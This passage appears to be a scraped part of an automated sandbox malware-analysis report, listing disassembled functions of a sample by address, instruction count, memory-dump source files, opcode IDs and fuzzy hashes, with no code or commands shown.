                                                                                                                                                                                                                                                                                  • Instruction ID: 7c2b19151de0a76cf8f28f5268d6b67fdbe149d87d493421a82599c7b60cea3e
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52f6d5e490fbb126a6ff7b1701bbe82b2d86a503b07016c15d5eb3855ba6564f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F781F7B3B15A85C7EB09DF2AD4507A873A5E748B84F848035DA0D47B94DF3CD661CB60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5A83C4 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 09f86d7bf020a1616741af4184dcfb5ba4b8671fe15046aec6e24d3f199e6ae6
                                                                                                                                                                                                                                                                                  • Instruction ID: 0a64822cbd852d3f354dd012d88a27c2ae376233aa5db5b392217e90bba86ced
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09f86d7bf020a1616741af4184dcfb5ba4b8671fe15046aec6e24d3f199e6ae6
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F661F577F12B8147E7089F29C855AAD72A2FBD4B89B959136CA0D43788DE3CD521CBC0
                                                                                                                                                                                                                                                                                  Function 00007FF72F5CA850 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 8b7f31b7dde57376d23b91118050d515ff30093a1b7f5c396985b31bb123e795
                                                                                                                                                                                                                                                                                  • Instruction ID: 3e95649be421fbe2384b39e7f07d8e8d297b40800820feed39b658cc019c89ae
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b7f31b7dde57376d23b91118050d515ff30093a1b7f5c396985b31bb123e795
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E510B22F1978E01E906977B59116B9C952EF5B7C0E9DCB31F90F32790EF2DB0818A20
                                                                                                                                                                                                                                                                                  Function 00007FF72F67E240 Relevance: .2, Instructions: 167COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 24f9807a77ec1231628a5fee68b55ea91a59b695855e809c40b27073d2b7f48a
                                                                                                                                                                                                                                                                                  • Instruction ID: a8e0ec866fe3de21eb71e2cfbe89cf309fdf2039ad72493e421f35a69e724e29
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24f9807a77ec1231628a5fee68b55ea91a59b695855e809c40b27073d2b7f48a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F512A53B3C1B282D7388B19A802ABDF293FB61741F809335E6AA09E95E72DD1459F10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5CFB40 Relevance: .2, Instructions: 166COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: c1d6c5c74579766a181c76732d0e982c6beea5bccfddb835f43d11907d24d000
                                                                                                                                                                                                                                                                                  • Instruction ID: 87d13a6879ddbe16e3c319fd49c6820be5c48811ebc2d0718314e6cdf9aa48bd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1d6c5c74579766a181c76732d0e982c6beea5bccfddb835f43d11907d24d000
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8061D322B29F8549D906DB7658506A8D295FF56BC4F948332EE4F33740EB3DA1928A30
                                                                                                                                                                                                                                                                                  Function 00007FF72F680200 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 3c5e064a75470d3b12434700b37e535a9a449cf43c98d28f8e1c4881788e2503
                                                                                                                                                                                                                                                                                  • Instruction ID: fae4b9f60e033d1de41777fe7073bb075f96bd36417a68a122d6c4e17382ef58
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c5e064a75470d3b12434700b37e535a9a449cf43c98d28f8e1c4881788e2503
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03510222B056C1AAE720AF26DC011E9B7A6FF58B84F888534FE4C83701DF38D545CB10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C3640 Relevance: .2, Instructions: 163COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 037180d382d50411797ef5447beba6102d2d9aae5c3127ec27b5573139ad0381
                                                                                                                                                                                                                                                                                  • Instruction ID: 0f89d08be408c6da777a394d981e34f72a127ce065c3152611a7af5980c4ed21
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 037180d382d50411797ef5447beba6102d2d9aae5c3127ec27b5573139ad0381
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1614532B14BC546D606DB26AC419B8E29AEF857C4BD89331ED4F62340DF3DA192CB24
                                                                                                                                                                                                                                                                                  Function 00007FF72F65CC30 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 13c3f70d5fe85c86b58ccce79dd20537651d5941e22fc2a909815bcf02fae0a2
                                                                                                                                                                                                                                                                                  • Instruction ID: fa18ec5e1fb1ce58f90bc3dd6923cdae3f8ddc562bfb2a179b2fe7b41b550462
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13c3f70d5fe85c86b58ccce79dd20537651d5941e22fc2a909815bcf02fae0a2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A515F62B0859285FE24AB2ADC542F8A26BFB94FC0F944131DA0E577A5DE2CD841CB10
                                                                                                                                                                                                                                                                                  Function 00007FF72F5DC800 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 096d27cd634f33b2b39273a113a3bfa11cc36e2ee31c477455c3f03cc6ef90c3
                                                                                                                                                                                                                                                                                  • Instruction ID: a954409e93f129102c0b4dbc2db371f85045bcf58c605483017497de8e52ae31
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 096d27cd634f33b2b39273a113a3bfa11cc36e2ee31c477455c3f03cc6ef90c3
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E61C132B19A9582EA04DF06EC446E8B761FB49BE0FC95236DA6E47794CF7CE440CB14
                                                                                                                                                                                                                                                                                  Function 00007FF72F5C6610 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 9f371b7c663320aac0712d55089f2ff7daf330af024b6290ddde3f6ee4752e1a
                                                                                                                                                                                                                                                                                  • Instruction ID: 92ef91868f2a2bcf52f2ff81288c480399c6626b41add83fbd4477c36983f7da
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f371b7c663320aac0712d55089f2ff7daf330af024b6290ddde3f6ee4752e1a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE418C6AB14ACA86EE00DF4AD8541E8A3B1F748BC0BC95032DE5E57705DF3CE581CB24
                                                                                                                                                                                                                                                                                  Function 00007FF72F662AC0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: ed14c80dd863059f2dff2c32daa8a57b105c1426a02afba91e4b980da70f0663
                                                                                                                                                                                                                                                                                  • Instruction ID: 5cd6ce52656cb6c20b875943b39fec349f0757b392cf28fd052ec2691f47f87b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed14c80dd863059f2dff2c32daa8a57b105c1426a02afba91e4b980da70f0663
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86419B32B04BA489F715CFB5E8406DD77B9FB58748F65812AEE8CA7A08DF348592C700
                                                                                                                                                                                                                                                                                  Function 00007FF72F684450 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 8c3a55e49a23a19c6e99d4e2879a1303fdaddfc18d9bca4d098764dac0d00ba1
                                                                                                                                                                                                                                                                                  • Instruction ID: 585a58051f09bf196d4fa4382f44e38334ebbb3a1f0a7df019842eaf08de0228
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c3a55e49a23a19c6e99d4e2879a1303fdaddfc18d9bca4d098764dac0d00ba1
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9931A412B091C2C6EA14BA269D401FDD667FB84BC4FD48438ED1E47B96DE2CE9468B60
                                                                                                                                                                                                                                                                                  Function 00007FF72F5D1470 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
                                                                                                                                                                                                                                                                                  • Instruction ID: 9dc17695230150dbc418a00019b6a7a1ee4fa41fcf21ca5c4ed89a071d413d9b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6721C822B2868242FFA4AF3BAA916FE5361DB89780F842031DE1E03F56DD1DD5814E14
                                                                                                                                                                                                                                                                                  Function 00007FF72F687A90 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
